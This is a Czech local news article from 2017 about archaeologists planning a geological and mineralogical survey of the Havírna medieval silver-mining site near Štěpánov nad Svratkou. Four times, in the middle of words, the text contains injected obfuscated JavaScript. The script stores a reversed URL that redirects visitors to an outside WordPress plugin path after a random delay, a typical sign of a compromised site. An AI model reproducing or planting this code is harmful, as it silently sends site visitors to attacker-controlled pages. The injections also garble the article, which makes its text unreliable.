Rainbow page separator

Vědci prozkoumají unikátní Havírnu, kde se těžilo stříbro

Neděle, 26. března 2017

Vědci prozkoumají unikátní Havírnu, kde se těžilo stříbro

Štěpánov nad Svratkou / Ve výzkumu archeologické lokality v lesní trati Havírna u Štěpánova hodlá le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos pokročit Archeologický ústav Akademie věd ČR v Brně. Jde o jeden z nejzachovalejších a nejrozsáhlejších areálů těžby a zpracování stříbra v 13. a 14. s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí v rámci České republiky. Aby se odborníci v prozkoumávání zhruba patnáctihektarové oblasti posunuli dále, potřebují podrobné zaměření celého areálu a zevrubný geologický a mineralogický průzkum.
Unikátní dochovaný komplex zahrnuje vlastní těžební otvírky, navazující úpravní a hutní pracoviště i zbytky obslužných provozů a hornických obydlí. Chystané aktivity vytvoří předpoklady pro další odborné studium, památkovou ochranu i prezentaci lokality veřejnosti. „Detailní geologický a mineralogický průzkum rozšíří dosud nedostatečné informace o charakteru a potenciálu ložiska, jeho zrudnění nebo také o pravděpodobném množství vytěženého drahého kovu. V širší perspektivě jde o data zásadní pro objektivní posouzení významu štěpánovské Havírny v ekonomice českých zemí 13. s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí,“ informoval ředitel Muzea Vysočiny Jihlava Karel Malý, který vede geologicko-mineralogickou část projektu.
Část nákladů pokryje Akademie věd ČR, prostředky přidá i Archeologický ústav Akademie věd ČR Brno a další část potřebných financí zaplatí Kraj Vysočina.

Fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to: www.stepanovnadsvratkou.cz